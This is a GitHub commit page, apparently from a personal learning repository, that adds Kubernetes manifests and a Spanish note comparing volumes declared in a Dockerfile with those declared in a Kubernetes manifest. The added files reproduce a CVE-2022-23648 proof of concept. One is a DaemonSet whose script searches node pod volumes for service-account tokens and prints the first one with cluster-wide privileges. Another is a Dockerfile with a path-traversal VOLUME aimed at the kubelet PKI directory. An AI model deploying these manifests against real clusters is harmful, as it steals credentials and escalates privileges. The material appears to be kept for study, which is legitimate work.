difference between volume in dockerfile or k8s manifest

DiegoAll · Oct 29, 2024 · 3ea4144 · 3ea4144
1 parent 34ff015
commit 3ea4144
Show file tree

Hide file tree

Showing 8 changed files with 66 additions and 0 deletions.
diff --git a/something/Dockerfile_tini b/something/Dockerfile_tini
diff --git a/something/deployment-tini.yaml b/something/deployment-tini.yaml
diff --git a/something/non-root-ubuntu.yaml b/something/non-root-ubuntu.yaml
diff --git a/something/non-root-user copy.yaml b/something/non-root-user copy.yaml
diff --git a/ssh-in-kubernetes.md b/ssh-in-kubernetes.md
diff --git a/volumes/ds.yaml b/volumes/ds.yaml
@@ -0,0 +1,41 @@
+apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: poctest
+  namespace: default
+  labels:
+    app: poctest
+spec:
+  selector:
+    matchLabels:
+      app: poctest
+  template:
+    metadata:
+      labels:
+        app: poctest
+    spec:
+      tolerations:
+      - key: node-role.kubernetes.io/master
+        operator: Exists
+        effect: NoSchedule
+      containers:
+      - name: poctest
+        image: ghcr.io/bgeesaman/cve-2022-23648-poc:v1 
+        command: ["bash", "-c"]
+        args:
+          - |
+            # Search /var/lib/kubelet/pods/*/volumes/* for files named 'token'
+            # which are the Kubernetes SA tokens
+            # Loop through each one found
+            for i in $(find /var/lib/kubelet/pods/*/volumes/* -name 'token' -type f); do
+              # If it's got all privileges in all namespaces
+              if [ "$(kubectl --token=`cat $i` auth can-i '*' '*' -A | grep yes)" == 'yes' ]; then
+                TOKEN="$(cat $i)";
+                # Send it to standard out
+                echo $TOKEN;
+                # And stop processing
+                break;
+              fi;
+            done
+            # Since these tokens expire, wait 30m, crash, and repeat
+            sleep 1800;
diff --git a/volumes/finding.md b/volumes/finding.md
@@ -0,0 +1,13 @@
+# finding
+
+¿Cual es la diferencia de colocar el volumen en el deployment de kubernetes (manifiesto) y colocarlo en el dockerfile?
+
+La diferencia principal entre declarar un volumen en el Dockerfile versus hacerlo en el manifiesto de Kubernetes es el alcance y control que cada opción permite en el entorno de ejecución del contenedor.
+
+
+    FROM registry.access.redhat.com/ubi8/ubi
+    VOLUME /../../../../../../../../var/lib/kubelet/pki/
+    ENTRYPOINT "/bin/bash"
+
+
+Estás indicando a Docker que el directorio especificado debe mantenerse independiente del sistema de archivos del contenedor para evitar la pérdida de datos. Este volumen no se monta automáticamente en Kubernetes, a menos que se declare explícitamente en el manifiesto. En el contexto de Kubernetes, la declaración de volumen en el Dockerfile actúa más como una sugerencia que el entorno de Kubernetes no seguirá automáticamente.
diff --git a/volumes/pod-manifest.yaml b/volumes/pod-manifest.yaml
@@ -0,0 +1,12 @@
+apiVersion: v1
+kind: Pod
+metadata:
+  name: poctest
+spec:
+  containers:
+    - name: poctest 
+      image: ghcr.io/raesene/cve-2022-23648-poc:v1 
+      command: ["/bin/bash", "-c", "--"]
+      args: [ "while true; do sleep 30; done" ]
+
+# Obtained from https://github.com/raesene/CVE-2022-23648-POC/